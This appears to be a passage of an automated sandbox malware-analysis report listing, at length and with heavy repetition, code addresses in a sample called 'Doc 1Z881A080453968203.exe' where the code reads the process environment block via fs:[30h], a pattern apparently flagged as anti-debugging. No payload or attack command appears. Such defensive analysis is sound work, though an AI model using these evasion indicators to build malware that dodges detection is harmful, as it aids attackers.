                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017204E5 mov ecx, dword ptr fs:[00000030h]7_2_017204E5
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017544B0 mov ecx, dword ptr fs:[00000030h]7_2_017544B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AA4B0 mov eax, dword ptr fs:[00000030h]7_2_017AA4B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017264AB mov eax, dword ptr fs:[00000030h]7_2_017264AB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DA49A mov eax, dword ptr fs:[00000030h]7_2_017DA49A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728770 mov eax, dword ptr fs:[00000030h]7_2_01728770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730770 mov eax, dword ptr fs:[00000030h]7_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720750 mov eax, dword ptr fs:[00000030h]7_2_01720750
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762750 mov eax, dword ptr fs:[00000030h]7_2_01762750
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762750 mov eax, dword ptr fs:[00000030h]7_2_01762750
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AE75D mov eax, dword ptr fs:[00000030h]7_2_017AE75D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A4755 mov eax, dword ptr fs:[00000030h]7_2_017A4755
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175674D mov esi, dword ptr fs:[00000030h]7_2_0175674D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175674D mov eax, dword ptr fs:[00000030h]7_2_0175674D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175674D mov eax, dword ptr fs:[00000030h]7_2_0175674D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175273C mov eax, dword ptr fs:[00000030h]7_2_0175273C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175273C mov ecx, dword ptr fs:[00000030h]7_2_0175273C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175273C mov eax, dword ptr fs:[00000030h]7_2_0175273C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179C730 mov eax, dword ptr fs:[00000030h]7_2_0179C730
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C720 mov eax, dword ptr fs:[00000030h]7_2_0175C720
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C720 mov eax, dword ptr fs:[00000030h]7_2_0175C720
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720710 mov eax, dword ptr fs:[00000030h]7_2_01720710
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01750710 mov eax, dword ptr fs:[00000030h]7_2_01750710
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C700 mov eax, dword ptr fs:[00000030h]7_2_0175C700
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017247FB mov eax, dword ptr fs:[00000030h]7_2_017247FB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017247FB mov eax, dword ptr fs:[00000030h]7_2_017247FB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017427ED mov eax, dword ptr fs:[00000030h]7_2_017427ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017427ED mov eax, dword ptr fs:[00000030h]7_2_017427ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017427ED mov eax, dword ptr fs:[00000030h]7_2_017427ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AE7E1 mov eax, dword ptr fs:[00000030h]7_2_017AE7E1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172C7C0 mov eax, dword ptr fs:[00000030h]7_2_0172C7C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A07C3 mov eax, dword ptr fs:[00000030h]7_2_017A07C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017207AF mov eax, dword ptr fs:[00000030h]7_2_017207AF
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D47A0 mov eax, dword ptr fs:[00000030h]7_2_017D47A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C678E mov eax, dword ptr fs:[00000030h]7_2_017C678E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01752674 mov eax, dword ptr fs:[00000030h]7_2_01752674
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E866E mov eax, dword ptr fs:[00000030h]7_2_017E866E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E866E mov eax, dword ptr fs:[00000030h]7_2_017E866E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A660 mov eax, dword ptr fs:[00000030h]7_2_0175A660
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A660 mov eax, dword ptr fs:[00000030h]7_2_0175A660
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173C640 mov eax, dword ptr fs:[00000030h]7_2_0173C640
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E627 mov eax, dword ptr fs:[00000030h]7_2_0173E627
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01756620 mov eax, dword ptr fs:[00000030h]7_2_01756620
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01758620 mov eax, dword ptr fs:[00000030h]7_2_01758620
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172262C mov eax, dword ptr fs:[00000030h]7_2_0172262C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762619 mov eax, dword ptr fs:[00000030h]7_2_01762619
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E609 mov eax, dword ptr fs:[00000030h]7_2_0179E609
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173260B mov eax, dword ptr fs:[00000030h]7_2_0173260B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E6F2 mov eax, dword ptr fs:[00000030h]7_2_0179E6F2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E6F2 mov eax, dword ptr fs:[00000030h]7_2_0179E6F2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E6F2 mov eax, dword ptr fs:[00000030h]7_2_0179E6F2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E6F2 mov eax, dword ptr fs:[00000030h]7_2_0179E6F2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A06F1 mov eax, dword ptr fs:[00000030h]7_2_017A06F1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A06F1 mov eax, dword ptr fs:[00000030h]7_2_017A06F1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0175A6C7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A6C7 mov eax, dword ptr fs:[00000030h]7_2_0175A6C7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017566B0 mov eax, dword ptr fs:[00000030h]7_2_017566B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C6A6 mov eax, dword ptr fs:[00000030h]7_2_0175C6A6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724690 mov eax, dword ptr fs:[00000030h]7_2_01724690
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724690 mov eax, dword ptr fs:[00000030h]7_2_01724690
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C4978 mov eax, dword ptr fs:[00000030h]7_2_017C4978
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C4978 mov eax, dword ptr fs:[00000030h]7_2_017C4978
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AC97C mov eax, dword ptr fs:[00000030h]7_2_017AC97C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01746962 mov eax, dword ptr fs:[00000030h]7_2_01746962
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01746962 mov eax, dword ptr fs:[00000030h]7_2_01746962
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01746962 mov eax, dword ptr fs:[00000030h]7_2_01746962
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176096E mov eax, dword ptr fs:[00000030h]7_2_0176096E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176096E mov edx, dword ptr fs:[00000030h]7_2_0176096E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176096E mov eax, dword ptr fs:[00000030h]7_2_0176096E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A0946 mov eax, dword ptr fs:[00000030h]7_2_017A0946
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A892A mov eax, dword ptr fs:[00000030h]7_2_017A892A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B892B mov eax, dword ptr fs:[00000030h]7_2_017B892B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AC912 mov eax, dword ptr fs:[00000030h]7_2_017AC912
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01718918 mov eax, dword ptr fs:[00000030h]7_2_01718918
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01718918 mov eax, dword ptr fs:[00000030h]7_2_01718918
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E908 mov eax, dword ptr fs:[00000030h]7_2_0179E908
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E908 mov eax, dword ptr fs:[00000030h]7_2_0179E908
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017529F9 mov eax, dword ptr fs:[00000030h]7_2_017529F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017529F9 mov eax, dword ptr fs:[00000030h]7_2_017529F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AE9E0 mov eax, dword ptr fs:[00000030h]7_2_017AE9E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A9D0 mov eax, dword ptr fs:[00000030h]7_2_0172A9D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017549D0 mov eax, dword ptr fs:[00000030h]7_2_017549D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EA9D3 mov eax, dword ptr fs:[00000030h]7_2_017EA9D3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B69C0 mov eax, dword ptr fs:[00000030h]7_2_017B69C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A89B3 mov esi, dword ptr fs:[00000030h]7_2_017A89B3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A89B3 mov eax, dword ptr fs:[00000030h]7_2_017A89B3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A89B3 mov eax, dword ptr fs:[00000030h]7_2_017A89B3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A0 mov eax, dword ptr fs:[00000030h]7_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017209AD mov eax, dword ptr fs:[00000030h]7_2_017209AD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017209AD mov eax, dword ptr fs:[00000030h]7_2_017209AD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AE872 mov eax, dword ptr fs:[00000030h]7_2_017AE872
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AE872 mov eax, dword ptr fs:[00000030h]7_2_017AE872
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6870 mov eax, dword ptr fs:[00000030h]7_2_017B6870
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6870 mov eax, dword ptr fs:[00000030h]7_2_017B6870
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01750854 mov eax, dword ptr fs:[00000030h]7_2_01750854
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724859 mov eax, dword ptr fs:[00000030h]7_2_01724859
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724859 mov eax, dword ptr fs:[00000030h]7_2_01724859
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01732840 mov ecx, dword ptr fs:[00000030h]7_2_01732840
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov eax, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov eax, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov eax, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov ecx, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov eax, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742835 mov eax, dword ptr fs:[00000030h]7_2_01742835
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A830 mov eax, dword ptr fs:[00000030h]7_2_0175A830
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C483A mov eax, dword ptr fs:[00000030h]7_2_017C483A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C483A mov eax, dword ptr fs:[00000030h]7_2_017C483A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AC810 mov eax, dword ptr fs:[00000030h]7_2_017AC810
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C8F9 mov eax, dword ptr fs:[00000030h]7_2_0175C8F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C8F9 mov eax, dword ptr fs:[00000030h]7_2_0175C8F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EA8E4 mov eax, dword ptr fs:[00000030h]7_2_017EA8E4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E8C0 mov eax, dword ptr fs:[00000030h]7_2_0174E8C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AC89D mov eax, dword ptr fs:[00000030h]7_2_017AC89D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720887 mov eax, dword ptr fs:[00000030h]7_2_01720887
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171CB7E mov eax, dword ptr fs:[00000030h]7_2_0171CB7E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CEB50 mov eax, dword ptr fs:[00000030h]7_2_017CEB50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D4B4B mov eax, dword ptr fs:[00000030h]7_2_017D4B4B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D4B4B mov eax, dword ptr fs:[00000030h]7_2_017D4B4B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6B40 mov eax, dword ptr fs:[00000030h]7_2_017B6B40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6B40 mov eax, dword ptr fs:[00000030h]7_2_017B6B40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EAB40 mov eax, dword ptr fs:[00000030h]7_2_017EAB40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C8B42 mov eax, dword ptr fs:[00000030h]7_2_017C8B42
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174EB20 mov eax, dword ptr fs:[00000030h]7_2_0174EB20
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174EB20 mov eax, dword ptr fs:[00000030h]7_2_0174EB20
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E8B28 mov eax, dword ptr fs:[00000030h]7_2_017E8B28
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E8B28 mov eax, dword ptr fs:[00000030h]7_2_017E8B28
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179EB1D mov eax, dword ptr fs:[00000030h]7_2_0179EB1D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728BF0 mov eax, dword ptr fs:[00000030h]7_2_01728BF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728BF0 mov eax, dword ptr fs:[00000030h]7_2_01728BF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728BF0 mov eax, dword ptr fs:[00000030h]7_2_01728BF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174EBFC mov eax, dword ptr fs:[00000030h]7_2_0174EBFC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017ACBF0 mov eax, dword ptr fs:[00000030h]7_2_017ACBF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CEBD0 mov eax, dword ptr fs:[00000030h]7_2_017CEBD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01740BCB mov eax, dword ptr fs:[00000030h]7_2_01740BCB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01740BCB mov eax, dword ptr fs:[00000030h]7_2_01740BCB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01740BCB mov eax, dword ptr fs:[00000030h]7_2_01740BCB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720BCD mov eax, dword ptr fs:[00000030h]7_2_01720BCD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720BCD mov eax, dword ptr fs:[00000030h]7_2_01720BCD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720BCD mov eax, dword ptr fs:[00000030h]7_2_01720BCD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730BBE mov eax, dword ptr fs:[00000030h]7_2_01730BBE
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730BBE mov eax, dword ptr fs:[00000030h]7_2_01730BBE
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D4BB0 mov eax, dword ptr fs:[00000030h]7_2_017D4BB0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D4BB0 mov eax, dword ptr fs:[00000030h]7_2_017D4BB0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179CA72 mov eax, dword ptr fs:[00000030h]7_2_0179CA72
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179CA72 mov eax, dword ptr fs:[00000030h]7_2_0179CA72
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175CA6F mov eax, dword ptr fs:[00000030h]7_2_0175CA6F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175CA6F mov eax, dword ptr fs:[00000030h]7_2_0175CA6F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175CA6F mov eax, dword ptr fs:[00000030h]7_2_0175CA6F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CEA60 mov eax, dword ptr fs:[00000030h]7_2_017CEA60
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726A50 mov eax, dword ptr fs:[00000030h]7_2_01726A50
